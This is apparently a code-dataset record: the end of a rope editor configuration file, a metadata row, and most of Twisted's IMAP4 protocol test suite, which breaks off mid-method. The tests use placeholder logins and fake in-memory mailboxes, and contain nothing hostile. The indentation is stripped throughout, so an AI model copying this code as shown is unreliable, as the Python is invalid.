# If `True`, rope ignores unresolvable imports. Otherwise, they
# appear in the importing namespace.
prefs['ignore_bad_imports'] = False
# If `True`, rope will insert new module imports as
# `from <package> import <module>` by default.
prefs['prefer_module_from_imports'] = False
# If `True`, rope will transform a comma list of imports into
# multiple separate import statements when organizing
# imports.
prefs['split_imports'] = False
# If `True`, rope will remove all top-level import statements and
# reinsert them at the top of the module when making changes.
prefs['pull_imports_to_top'] = True
# If `True`, rope will sort imports alphabetically by module name instead of
# alphabetically by import statement, with from imports after normal
# imports.
prefs['sort_imports_alphabetically'] = False
# Location of implementation of rope.base.oi.type_hinting.interfaces.ITypeHintingFactory
# In general case, you don't have to change this value, unless you're an rope expert.
# Change this value to inject you own implementations of interfaces
# listed in module rope.base.oi.type_hinting.providers.interfaces
# For example, you can add you own providers for Django Models, or disable the search
# type-hinting in a class hierarchy, etc.
prefs['type_hinting_factory'] = 'rope.base.oi.type_hinting.factory.default_type_hinting_factory'
def project_opened(project):
"""This function is called after opening the project"""
# Do whatever you like here!
| unlicense | 7,511,925,054,516,250,000 | 41.625 | 100 | 0.677419 | false |
fxia22/ASM_xf | PythonD/site_python/twisted/test/test_imap.py | 2 | 47492 | # Twisted, the Framework of Your Internet
# Copyright (C) 2001 Matthew W. Lefkowitz
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
Test case for twisted.protocols.imap4
"""
from __future__ import nested_scopes
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
import os, sys, types
from twisted.protocols.imap4 import MessageSet
from twisted.protocols import imap4
from twisted.protocols import loopback
from twisted.internet import defer
from twisted.trial import unittest
from twisted.python import util
from twisted.cred import authorizer, service
from twisted.internet.app import _AbstractServiceCollection # I don't feel like reimplementing this.
def strip(f):
return lambda result, f=f: f()
def sortNest(l):
l = l[:]
l.sort()
for i in range(len(l)):
if isinstance(l[i], types.ListType):
l[i] = sortNest(l[i])
elif isinstance(l[i], types.TupleType):
l[i] = tuple(sortNest(list(l[i])))
return l
class IMAP4UTF7TestCase(unittest.TestCase):
tests = [
['Hello world', 'Hello world'],
['Hello & world', 'Hello &- world'],
['Hello\xffworld', 'Hello&,w-world'],
['\xff\xfe\xfd\xfc', '&,,79,A-'],
]
def testEncode(self):
for (input, output) in self.tests:
self.assertEquals(input.encode('imap4-utf-7'), output)
def testDecode(self):
for (input, output) in self.tests:
# XXX - Piece of *crap* 2.1
self.assertEquals(input, imap4.decoder(output)[0])
class IMAP4HelperTestCase(unittest.TestCase):
def testMessageSet(self):
m1 = MessageSet()
m2 = MessageSet()
self.assertEquals(m1, m2)
m1 = m1 + (1, 3)
self.assertEquals(len(m1), 3)
self.assertEquals(list(m1), [1, 2, 3])
m2 = m2 + (1, 3)
self.assertEquals(m1, m2)
self.assertEquals(list(m1 + m2), [1, 2, 3, 1, 2, 3])
def testQuotedSplitter(self):
cases = [
'''Hello World''',
'''Hello "World!"''',
'''World "Hello" "How are you?"''',
'''"Hello world" How "are you?"''',
'''foo bar "baz buz" NIL''',
'''foo bar "baz buz" "NIL"''',
'''foo NIL "baz buz" bar''',
'''foo "NIL" "baz buz" bar''',
'''"NIL" bar "baz buz" foo''',
]
answers = [
['Hello', 'World'],
['Hello', 'World!'],
['World', 'Hello', 'How are you?'],
['Hello world', 'How', 'are you?'],
['foo', 'bar', 'baz buz', None],
['foo', 'bar', 'baz buz', 'NIL'],
['foo', None, 'baz buz', 'bar'],
['foo', 'NIL', 'baz buz', 'bar'],
['NIL', 'bar', 'baz buz', 'foo'],
]
errors = [
'"mismatched quote',
'mismatched quote"',
'mismatched"quote',
'"oops here is" another"',
]
for s in errors:
self.assertRaises(imap4.MismatchedQuoting, imap4.splitQuoted, s)
for (case, expected) in zip(cases, answers):
self.assertEquals(imap4.splitQuoted(case), expected)
def testStringCollapser(self):
cases = [
['a', 'b', 'c', 'd', 'e'],
['a', ' ', '"', 'b', 'c', ' ', '"', ' ', 'd', 'e'],
[['a', 'b', 'c'], 'd', 'e'],
['a', ['b', 'c', 'd'], 'e'],
['a', 'b', ['c', 'd', 'e']],
['"', 'a', ' ', '"', ['b', 'c', 'd'], '"', ' ', 'e', '"'],
['a', ['"', ' ', 'b', 'c', ' ', ' ', '"'], 'd', 'e'],
]
answers = [
['abcde'],
['a', 'bc ', 'de'],
[['abc'], 'de'],
['a', ['bcd'], 'e'],
['ab', ['cde']],
['a ', ['bcd'], ' e'],
['a', [' bc '], 'de'],
]
for (case, expected) in zip(cases, answers):
self.assertEquals(imap4.collapseStrings(case), expected)
def testParenParser(self):
s = '\r\n'.join(['xx'] * 4)
cases = [
'(BODY.PEEK[HEADER.FIELDS.NOT (subject bcc cc)] {%d}\r\n%s)' % (len(s), s,),
# '(FLAGS (\Seen) INTERNALDATE "17-Jul-1996 02:44:25 -0700" '
# 'RFC822.SIZE 4286 ENVELOPE ("Wed, 17 Jul 1996 02:23:25 -0700 (PDT)" '
# '"IMAP4rev1 WG mtg summary and minutes" '
# '(("Terry Gray" NIL "gray" "cac.washington.edu")) '
# '(("Terry Gray" NIL "gray" "cac.washington.edu")) '
# '(("Terry Gray" NIL "gray" "cac.washington.edu")) '
# '((NIL NIL "imap" "cac.washington.edu")) '
# '((NIL NIL "minutes" "CNRI.Reston.VA.US") '
# '("John Klensin" NIL "KLENSIN" "INFOODS.MIT.EDU")) NIL NIL '
# '"<[email protected]>") '
# 'BODY ("TEXT" "PLAIN" ("CHARSET" "US-ASCII") NIL NIL "7BIT" 3028 92))',
'(FLAGS (\Seen) INTERNALDATE "17-Jul-1996 02:44:25 -0700" '
'RFC822.SIZE 4286 ENVELOPE ("Wed, 17 Jul 1996 02:23:25 -0700 (PDT)" '
'"IMAP4rev1 WG mtg summary and minutes" '
'(("Terry Gray" NIL gray cac.washington.edu)) '
'(("Terry Gray" NIL gray cac.washington.edu)) '
'(("Terry Gray" NIL gray cac.washington.edu)) '
'((NIL NIL imap cac.washington.edu)) '
'((NIL NIL minutes CNRI.Reston.VA.US) '
'("John Klensin" NIL KLENSIN INFOODS.MIT.EDU)) NIL NIL '
'<[email protected]>) '
'BODY (TEXT PLAIN (CHARSET US-ASCII) NIL NIL 7BIT 3028 92))',
]
answers = [
['BODY.PEEK', ['HEADER.FIELDS.NOT', ['subject', 'bcc', 'cc']], s],
['FLAGS', [r'\Seen'], 'INTERNALDATE',
'17-Jul-1996 02:44:25 -0700', 'RFC822.SIZE', '4286', 'ENVELOPE',
['Wed, 17 Jul 1996 02:23:25 -0700 (PDT)',
'IMAP4rev1 WG mtg summary and minutes', [["Terry Gray", None,
"gray", "cac.washington.edu"]], [["Terry Gray", None,
"gray", "cac.washington.edu"]], [["Terry Gray", None,
"gray", "cac.washington.edu"]], [[None, None, "imap",
"cac.washington.edu"]], [[None, None, "minutes",
"CNRI.Reston.VA.US"], ["John Klensin", None, "KLENSIN",
"INFOODS.MIT.EDU"]], None, None,
"<[email protected]>"], "BODY", ["TEXT", "PLAIN",
["CHARSET", "US-ASCII"], None, None, "7BIT", "3028", "92"]],
]
for (case, expected) in zip(cases, answers):
self.assertEquals(imap4.parseNestedParens(case), [expected])
for (case, expected) in zip(answers, cases):
self.assertEquals('(' + imap4.collapseNestedLists(case) + ')', expected)
def testLiterals(self):
cases = [
('({10}\r\n0123456789)', [['0123456789']]),
]
for (case, expected) in cases:
self.assertEquals(imap4.parseNestedParens(case), expected)
def testQueryBuilder(self):
inputs = [
imap4.Query(flagged=1),
imap4.Query(sorted=1, unflagged=1, deleted=1),
imap4.Or(imap4.Query(flagged=1), imap4.Query(deleted=1)),
imap4.Query(before='today'),
imap4.Or(
imap4.Query(deleted=1),
imap4.Query(unseen=1),
imap4.Query(new=1)
),
imap4.Or(
imap4.Not(
imap4.Or(
imap4.Query(sorted=1, since='yesterday', smaller=1000),
imap4.Query(sorted=1, before='tuesday', larger=10000),
imap4.Query(sorted=1, unseen=1, deleted=1, before='today'),
imap4.Not(
imap4.Query(subject='spam')
),
),
),
imap4.Not(
imap4.Query(uid='1:5')
),
)
]
outputs = [
'FLAGGED',
'(DELETED UNFLAGGED)',
'(OR FLAGGED DELETED)',
'(BEFORE "today")',
'(OR DELETED (OR UNSEEN NEW))',
'(OR (NOT (OR (SINCE "yesterday" SMALLER 1000) ' # Continuing
'(OR (BEFORE "tuesday" LARGER 10000) (OR (BEFORE ' # Some more
'"today" DELETED UNSEEN) (NOT (SUBJECT "spam")))))) ' # And more
'(NOT (UID 1:5)))',
]
for (query, expected) in zip(inputs, outputs):
self.assertEquals(query, expected)
def testIdListParser(self):
inputs = [
'1:*',
'5:*',
'1:2,5:*',
'1',
'1,2',
'1,3,5',
'1:10',
'1:10,11',
'1:5,10:20',
'1,5:10',
'1,5:10,15:20',
'1:10,15,20:25',
]
outputs = [
MessageSet(1, None),
MessageSet(5, None),
MessageSet(1, 2, 5, None),
MessageSet(1, 1),
MessageSet(1, 1, 2, 2),
MessageSet(1, 1, 3, 3, 5, 5),
MessageSet(1, 10),
MessageSet(1, 10, 11, 11),
MessageSet(1, 5, 10, 20),
MessageSet(1, 1, 5, 10),
MessageSet(1, 1, 5, 10, 15, 20),
MessageSet(1, 10, 15, 15, 20, 25),
]
lengths = [
sys.maxint, sys.maxint, sys.maxint,
1, 2, 3, 10, 11, 16, 7, 13, 17,
]
for (input, expected) in zip(inputs, outputs):
self.assertEquals(imap4.parseIdList(input), expected)
for (input, expected) in zip(inputs, lengths):
L = len(imap4.parseIdList(input))
self.assertEquals(L, expected,
"len(%r) = %d != %d" % (input, L, expected))
class SimpleMailbox:
flags = ('\\Flag1', 'Flag2', '\\AnotherSysFlag', 'LastFlag')
messages = []
mUID = 0
rw = 1
def __init__(self):
self.listeners = []
self.addListener = self.listeners.append
self.removeListener = self.listeners.remove
def getFlags(self):
return self.flags
def getUIDValidity(self):
return 42
def getUIDNext(self):
return len(self.messages) + 1
def getMessageCount(self):
return 9
def getRecentCount(self):
return 3
def getUnseenCount(self):
return 4
def isWriteable(self):
return self.rw
def destroy(self):
pass
def getHierarchicalDelimiter(self):
return '/'
def requestStatus(self, names):
r = {}
if 'MESSAGES' in names:
r['MESSAGES'] = self.getMessageCount()
if 'RECENT' in names:
r['RECENT'] = self.getRecentCount()
if 'UIDNEXT' in names:
r['UIDNEXT'] = self.getMessageCount() + 1
if 'UIDVALIDITY' in names:
            r['UIDVALIDITY'] = self.getUIDValidity()
if 'UNSEEN' in names:
r['UNSEEN'] = self.getUnseenCount()
return defer.succeed(r)
def addMessage(self, message, flags, date = None):
self.messages.append((message, flags, date, self.mUID))
self.mUID += 1
return defer.succeed(None)
def expunge(self):
delete = []
for i in self.messages:
if '\\Deleted' in i[1]:
delete.append(i)
for i in delete:
self.messages.remove(i)
return [i[3] for i in delete]
class Account(imap4.MemoryAccount):
def _emptyMailbox(self, name, id):
return SimpleMailbox()
def select(self, name, rw=1):
mbox = imap4.MemoryAccount.select(self, name)
if mbox is not None:
mbox.rw = rw
return mbox
class SimpleServer(imap4.IMAP4Server):
def authenticateLogin(self, username, password):
if username == 'testuser' and password == 'password-test':
return self.theAccount
return None
class SimpleClient(imap4.IMAP4Client):
def __init__(self, deferred):
imap4.IMAP4Client.__init__(self)
self.deferred = deferred
self.events = []
def connectionMade(self):
self.deferred.callback(None)
def modeChanged(self, writeable):
self.events.append(['modeChanged', writeable])
self.transport.loseConnection()
def flagsChanged(self, newFlags):
self.events.append(['flagsChanged', newFlags])
self.transport.loseConnection()
def newMessages(self, exists, recent):
self.events.append(['newMessages', exists, recent])
self.transport.loseConnection()
class IMAP4HelperMixin:
def setUp(self):
d = defer.Deferred()
self.server = SimpleServer()
self.client = SimpleClient(d)
self.connected = d
SimpleMailbox.messages = []
theAccount = Account('testuser')
theAccount.mboxType = SimpleMailbox
SimpleServer.theAccount = theAccount
def tearDown(self):
del self.server
del self.client
del self.connected
def _cbStopClient(self, ignore):
self.client.transport.loseConnection()
def _ebGeneral(self, failure):
self.client.transport.loseConnection()
self.server.transport.loseConnection()
failure.printTraceback(open('failure.log', 'w'))
failure.printTraceback()
raise failure.value
def loopback(self):
loopback.loopback(self.server, self.client)
class IMAP4ServerTestCase(IMAP4HelperMixin, unittest.TestCase):
def testCapability(self):
caps = {}
def getCaps():
def gotCaps(c):
caps.update(c)
self.server.transport.loseConnection()
return self.client.getCapabilities().addCallback(gotCaps)
self.connected.addCallback(strip(getCaps)).addErrback(self._ebGeneral)
self.loopback()
refCaps = self.server.CAPABILITIES.copy()
refCaps['IMAP4rev1'] = None
self.assertEquals(refCaps, caps)
def testLogout(self):
self.loggedOut = 0
def logout():
def setLoggedOut():
self.loggedOut = 1
self.client.logout().addCallback(strip(setLoggedOut))
self.connected.addCallback(strip(logout)).addErrback(self._ebGeneral)
self.loopback()
self.assertEquals(self.loggedOut, 1)
def testNoop(self):
self.responses = None
def noop():
def setResponses(responses):
self.responses = responses
self.server.transport.loseConnection()
self.client.noop().addCallback(setResponses)
self.connected.addCallback(strip(noop)).addErrback(self._ebGeneral)
self.loopback()
self.assertEquals(self.responses, [])
def testLogin(self):
def login():
d = self.client.login('testuser', 'password-test')
d.addCallback(self._cbStopClient)
self.connected.addCallback(strip(login)).addErrback(self._ebGeneral)
self.loopback()
self.assertEquals(self.server.account, SimpleServer.theAccount)
self.assertEquals(self.server.state, 'auth')
def testFailedLogin(self):
def login():
d = self.client.login('testuser', 'wrong-password')
d.addBoth(self._cbStopClient)
self.connected.addCallback(strip(login)).addErrback(self._ebGeneral)
self.loopback()
self.assertEquals(self.server.account, None)
self.assertEquals(self.server.state, 'unauth')
def testSelect(self):
SimpleServer.theAccount.addMailbox('test-mailbox')
self.selectedArgs = None
def login():
return self.client.login('testuser', 'password-test')
def select():
def selected(args):
self.selectedArgs = args
self._cbStopClient(None)
d = self.client.select('test-mailbox')
d.addCallback(selected)
return d
d = self.connected.addCallback(strip(login))
d.addCallback(strip(select))
d.addErrback(self._ebGeneral)
self.loopback()
mbox = SimpleServer.theAccount.mailboxes['TEST-MAILBOX']
self.assertEquals(self.server.mbox, mbox)
self.assertEquals(self.selectedArgs, {
'EXISTS': 9, 'RECENT': 3, 'UIDVALIDITY': 42,
'FLAGS': ('\\Flag1', 'Flag2', '\\AnotherSysFlag', 'LastFlag'),
'READ-WRITE': 1
})
def testExamine(self):
SimpleServer.theAccount.addMailbox('test-mailbox')
self.examinedArgs = None
def login():
return self.client.login('testuser', 'password-test')
def examine():
def examined(args):
self.examinedArgs = args
self._cbStopClient(None)
d = self.client.examine('test-mailbox')
d.addCallback(examined)
return d
d = self.connected.addCallback(strip(login))
d.addCallback(strip(examine))
d.addErrback(self._ebGeneral)
self.loopback()
mbox = SimpleServer.theAccount.mailboxes['TEST-MAILBOX']
self.assertEquals(self.server.mbox, mbox)
self.assertEquals(self.examinedArgs, {
'EXISTS': 9, 'RECENT': 3, 'UIDVALIDITY': 42,
'FLAGS': ('\\Flag1', 'Flag2', '\\AnotherSysFlag', 'LastFlag'),
'READ-WRITE': 0
})
def testCreate(self):
succeed = ('testbox', 'test/box', 'test/', 'test/box/box', 'INBOX')
fail = ('testbox', 'test/box')
def cb(): self.result.append(1)
def eb(failure): self.result.append(0)
def login():
return self.client.login('testuser', 'password-test')
def create():
for name in succeed + fail:
d = self.client.create(name)
d.addCallback(strip(cb)).addErrback(eb)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.result = []
d = self.connected.addCallback(strip(login)).addCallback(strip(create))
self.loopback()
self.assertEquals(self.result, [1] * len(succeed) + [0] * len(fail))
mbox = SimpleServer.theAccount.mailboxes.keys()
answers = ['inbox', 'testbox', 'test/box', 'test', 'test/box/box']
mbox.sort()
answers.sort()
self.assertEquals(mbox, [a.upper() for a in answers])
def testDelete(self):
SimpleServer.theAccount.addMailbox('delete/me')
def login():
return self.client.login('testuser', 'password-test')
def delete():
return self.client.delete('delete/me')
d = self.connected.addCallbacks(strip(login))
d.addCallbacks(strip(delete), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(SimpleServer.theAccount.mailboxes.keys(), [])
def testNonExistentDelete(self):
def login():
return self.client.login('testuser', 'password-test')
def delete():
return self.client.delete('delete/me')
def deleteFailed(failure):
self.failure = failure
self.failure = None
d = self.connected.addCallback(strip(login))
d.addCallback(strip(delete)).addErrback(deleteFailed)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(str(self.failure.value), 'No such mailbox')
def testIllegalDelete(self):
m = SimpleMailbox()
m.flags = (r'\Noselect',)
SimpleServer.theAccount.addMailbox('delete', m)
SimpleServer.theAccount.addMailbox('delete/me')
def login():
return self.client.login('testuser', 'password-test')
def delete():
return self.client.delete('delete')
def deleteFailed(failure):
self.failure = failure
self.failure = None
d = self.connected.addCallback(strip(login))
d.addCallback(strip(delete)).addErrback(deleteFailed)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(str(self.failure.value), "Hierarchically inferior mailboxes exist and \\Noselect is set")
def testRename(self):
SimpleServer.theAccount.addMailbox('oldmbox')
def login():
return self.client.login('testuser', 'password-test')
def rename():
return self.client.rename('oldmbox', 'newname')
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(rename), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(SimpleServer.theAccount.mailboxes.keys(), ['NEWNAME'])
def testHierarchicalRename(self):
SimpleServer.theAccount.create('oldmbox/m1')
SimpleServer.theAccount.create('oldmbox/m2')
def login():
return self.client.login('testuser', 'password-test')
def rename():
return self.client.rename('oldmbox', 'newname')
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(rename), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
mboxes = SimpleServer.theAccount.mailboxes.keys()
expected = ['newname', 'newname/m1', 'newname/m2']
mboxes.sort()
self.assertEquals(mboxes, [s.upper() for s in expected])
def testSubscribe(self):
def login():
return self.client.login('testuser', 'password-test')
def subscribe():
return self.client.subscribe('this/mbox')
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(subscribe), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(SimpleServer.theAccount.subscriptions, ['THIS/MBOX'])
def testUnsubscribe(self):
SimpleServer.theAccount.subscriptions = ['THIS/MBOX', 'THAT/MBOX']
def login():
return self.client.login('testuser', 'password-test')
def unsubscribe():
return self.client.unsubscribe('this/mbox')
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(unsubscribe), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(SimpleServer.theAccount.subscriptions, ['THAT/MBOX'])
def _listSetup(self, f):
SimpleServer.theAccount.addMailbox('root/subthing')
SimpleServer.theAccount.addMailbox('root/another-thing')
SimpleServer.theAccount.addMailbox('non-root/subthing')
def login():
return self.client.login('testuser', 'password-test')
def listed(answers):
self.listed = answers
self.listed = None
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(f), self._ebGeneral)
d.addCallbacks(listed, self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
return self.listed
def testList(self):
def list():
return self.client.list('root', '%')
listed = self._listSetup(list)
self.assertEquals(
sortNest(listed),
sortNest([
(SimpleMailbox.flags, "/", "ROOT/SUBTHING"),
(SimpleMailbox.flags, "/", "ROOT/ANOTHER-THING")
])
)
def testLSub(self):
SimpleServer.theAccount.subscribe('ROOT/SUBTHING')
def lsub():
return self.client.lsub('root', '%')
listed = self._listSetup(lsub)
self.assertEquals(listed, [(SimpleMailbox.flags, "/", "ROOT/SUBTHING")])
def testStatus(self):
SimpleServer.theAccount.addMailbox('root/subthing')
def login():
return self.client.login('testuser', 'password-test')
def status():
return self.client.status('root/subthing', 'MESSAGES', 'UIDNEXT', 'UNSEEN')
def statused(result):
self.statused = result
self.statused = None
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(status), self._ebGeneral)
d.addCallbacks(statused, self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(
self.statused,
{'MESSAGES': 9, 'UIDNEXT': '10', 'UNSEEN': 4}
)
def testFailedStatus(self):
def login():
return self.client.login('testuser', 'password-test')
def status():
return self.client.status('root/nonexistent', 'MESSAGES', 'UIDNEXT', 'UNSEEN')
def statused(result):
self.statused = result
def failed(failure):
self.failure = failure
self.statused = self.failure = None
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(status), self._ebGeneral)
d.addCallbacks(statused, failed)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(
self.statused, None
)
self.assertEquals(
self.failure.value.args,
('Could not open mailbox',)
)
def testFullAppend(self):
infile = util.sibpath(__file__, 'rfc822.message')
message = open(infile)
SimpleServer.theAccount.addMailbox('root/subthing')
def login():
return self.client.login('testuser', 'password-test')
def append():
return self.client.append(
'root/subthing',
message,
('\\SEEN', '\\DELETED'),
'Tue, 17 Jun 2003 11:22:16 -0600 (MDT)',
)
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(append), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
mb = SimpleServer.theAccount.mailboxes['ROOT/SUBTHING']
self.assertEquals(1, len(mb.messages))
self.assertEquals(
(['\\SEEN', '\\DELETED'], 'Tue, 17 Jun 2003 11:22:16 -0600 (MDT)', 0),
mb.messages[0][1:]
)
self.assertEquals(open(infile).read(), mb.messages[0][0].getvalue())
def testPartialAppend(self):
infile = util.sibpath(__file__, 'rfc822.message')
message = open(infile)
SimpleServer.theAccount.addMailbox('PARTIAL/SUBTHING')
def login():
return self.client.login('testuser', 'password-test')
def append():
message = file(infile)
continuation = defer.Deferred()
continuation.addCallback(self.client._IMAP4Client__cbContinueAppend, message)
continuation.addErrback(self.client._IMAP4Client__ebContinueAppend)
return self.client.sendCommand(
imap4.Command(
'APPEND',
'PARTIAL/SUBTHING (\\SEEN) "Right now" {%d}' % os.path.getsize(infile),
continuation
)
).addCallback(self.client._IMAP4Client__cbAppend)
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(append), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
d.setTimeout(5)
self.loopback()
mb = SimpleServer.theAccount.mailboxes['PARTIAL/SUBTHING']
self.assertEquals(1, len(mb.messages))
self.assertEquals(
(['\\SEEN'], 'Right now', 0),
mb.messages[0][1:]
)
self.assertEquals(open(infile).read(), mb.messages[0][0].getvalue())
def testCheck(self):
SimpleServer.theAccount.addMailbox('root/subthing')
def login():
return self.client.login('testuser', 'password-test')
def select():
return self.client.select('root/subthing')
def check():
return self.client.check()
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(select), self._ebGeneral)
d.addCallbacks(strip(check), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
# Okay, that was fun
def testClose(self):
m = SimpleMailbox()
m.messages = [
('Message 1', ('\\Deleted', 'AnotherFlag'), None, 0),
('Message 2', ('AnotherFlag',), None, 1),
('Message 3', ('\\Deleted',), None, 2),
]
SimpleServer.theAccount.addMailbox('mailbox', m)
def login():
return self.client.login('testuser', 'password-test')
def select():
return self.client.select('mailbox')
def close():
return self.client.close()
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(select), self._ebGeneral)
d.addCallbacks(strip(close), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(len(m.messages), 1)
self.assertEquals(m.messages[0], ('Message 2', ('AnotherFlag',), None, 1))
def testExpunge(self):
m = SimpleMailbox()
m.messages = [
('Message 1', ('\\Deleted', 'AnotherFlag'), None, 0),
('Message 2', ('AnotherFlag',), None, 1),
('Message 3', ('\\Deleted',), None, 2),
]
SimpleServer.theAccount.addMailbox('mailbox', m)
def login():
return self.client.login('testuser', 'password-test')
def select():
return self.client.select('mailbox')
def expunge():
return self.client.expunge()
def expunged(results):
self.results = results
self.results = None
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(select), self._ebGeneral)
d.addCallbacks(strip(expunge), self._ebGeneral)
d.addCallbacks(expunged, self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(len(m.messages), 1)
self.assertEquals(m.messages[0], ('Message 2', ('AnotherFlag',), None, 1))
self.assertEquals(self.results, [0, 2])
class DummyService(service.Service):
def __init__(self, authorizer):
service.Service.__init__(self, 'MessageStorage', authorizer=authorizer)
class AuthenticatorTestCase(IMAP4HelperMixin, unittest.TestCase):
def setUp(self):
IMAP4HelperMixin.setUp(self)
services = _AbstractServiceCollection()
auth = authorizer.DefaultAuthorizer(services)
service = DummyService(auth)
services.addService(service)
ident = imap4.CramMD5Identity('testuser', auth)
ident.setPassword('secret')
a = Account('testuser')
service.addPerspective(a)
ident.addKeyForPerspective(a)
auth.addIdentity(ident)
sAuth = imap4.CramMD5ServerAuthenticator('test-domain.com', auth)
cAuth = imap4.CramMD5ClientAuthenticator('testuser')
self.client.registerAuthenticator(cAuth)
self.server.registerChallenger(sAuth)
self.authenticated = 0
self.account = a
def testCramMD5(self):
def auth():
return self.client.authenticate('secret')
def authed():
self.authenticated = 1
d = self.connected.addCallback(strip(auth))
d.addCallbacks(strip(authed), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(self.authenticated, 1)
self.assertEquals(self.server.account, self.account)
def testFailedCramMD5(self):
def misauth():
return self.client.authenticate('not the secret')
def authed():
self.authenticated = 1
def misauthed():
self.authenticated = -1
d = self.connected.addCallback(strip(misauth))
d.addCallbacks(strip(authed), strip(misauthed))
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(self.authenticated, -1)
self.assertEquals(self.server.account, None)
class UnsolicitedResponseTestCase(IMAP4HelperMixin, unittest.TestCase):
def testReadWrite(self):
def login():
return self.client.login('testuser', 'password-test')
def loggedIn():
self.server.modeChanged(1)
d = self.connected.addCallback(strip(login))
d.addCallback(strip(loggedIn)).addErrback(self._ebGeneral)
self.loopback()
E = self.client.events
self.assertEquals(E, [['modeChanged', 1]])
def testReadOnly(self):
def login():
return self.client.login('testuser', 'password-test')
def loggedIn():
self.server.modeChanged(0)
d = self.connected.addCallback(strip(login))
d.addCallback(strip(loggedIn)).addErrback(self._ebGeneral)
self.loopback()
E = self.client.events
self.assertEquals(E, [['modeChanged', 0]])
def testFlagChange(self):
flags = {
1: ['\\Answered', '\\Deleted'],
5: [],
10: ['\\Recent']
}
def login():
return self.client.login('testuser', 'password-test')
def loggedIn():
self.server.flagsChanged(flags)
d = self.connected.addCallback(strip(login))
d.addCallback(strip(loggedIn)).addErrback(self._ebGeneral)
self.loopback()
E = self.client.events
expect = [['flagsChanged', {x[0]: x[1]}] for x in flags.items()]
E.sort()
expect.sort()
self.assertEquals(E, expect)
def testNewMessages(self):
def login():
return self.client.login('testuser', 'password-test')
def loggedIn():
self.server.newMessages(10, None)
d = self.connected.addCallback(strip(login))
d.addCallback(strip(loggedIn)).addErrback(self._ebGeneral)
self.loopback()
E = self.client.events
self.assertEquals(E, [['newMessages', 10, None]])
def testNewRecentMessages(self):
def login():
return self.client.login('testuser', 'password-test')
def loggedIn():
self.server.newMessages(None, 10)
d = self.connected.addCallback(strip(login))
d.addCallback(strip(loggedIn)).addErrback(self._ebGeneral)
self.loopback()
E = self.client.events
self.assertEquals(E, [['newMessages', None, 10]])
def testNewMessagesAndRecent(self):
def login():
return self.client.login('testuser', 'password-test')
def loggedIn():
self.server.newMessages(20, 10)
d = self.connected.addCallback(strip(login))
d.addCallback(strip(loggedIn)).addErrback(self._ebGeneral)
self.loopback()
E = self.client.events
self.assertEquals(E, [['newMessages', 20, None], ['newMessages', None, 10]])
class StringTransport:
disconnecting = 0
def __init__(self):
self.io = StringIO()
def write(self, data):
self.io.write(data)
def writeSequence(self, data):
self.io.write(''.join(data))
def loseConnection(self):
pass
def getPeer(self):
return ('StringIO', repr(self.io))
def getHost(self):
return ('StringIO', repr(self.io))
class HandCraftedTestCase(unittest.TestCase):
def testTrailingLiteral(self):
transport = StringTransport()
c = imap4.IMAP4Client()
c.makeConnection(transport)
c.lineReceived('* OK SERVER BANNER')
d = c.login('blah', 'blah')
c.dataReceived('0001 OK CAPABILITY\r\n0002 OK LOGIN\r\n')
self.failUnless(unittest.deferredResult(d))
d = c.select('inbox')
c.lineReceived('0003 OK SELECT')
self.failUnless(unittest.deferredResult(d))
d = c.fetchMessage('1')
c.dataReceived('* 1 FETCH (RFC822 {10}\r\n0123456789\r\n RFC822.SIZE 10)\r\n')
c.dataReceived('0004 OK FETCH\r\n')
self.failUnless(unittest.deferredResult(d))
class FakeyServer(imap4.IMAP4Server):
state = 'select'
timeout = None
def sendServerGreeting(self):
pass
class FetchSearchStoreCopyTestCase(unittest.TestCase, IMAP4HelperMixin):
def setUp(self):
self.expected = self.result = None
self.server_received_query = None
self.server_received_uid = None
self.server_received_parts = None
self.server_received_messages = None
self.server = imap4.IMAP4Server()
self.server.state = 'select'
self.server.mbox = self
self.connected = defer.Deferred()
self.client = SimpleClient(self.connected)
def search(self, query, uid):
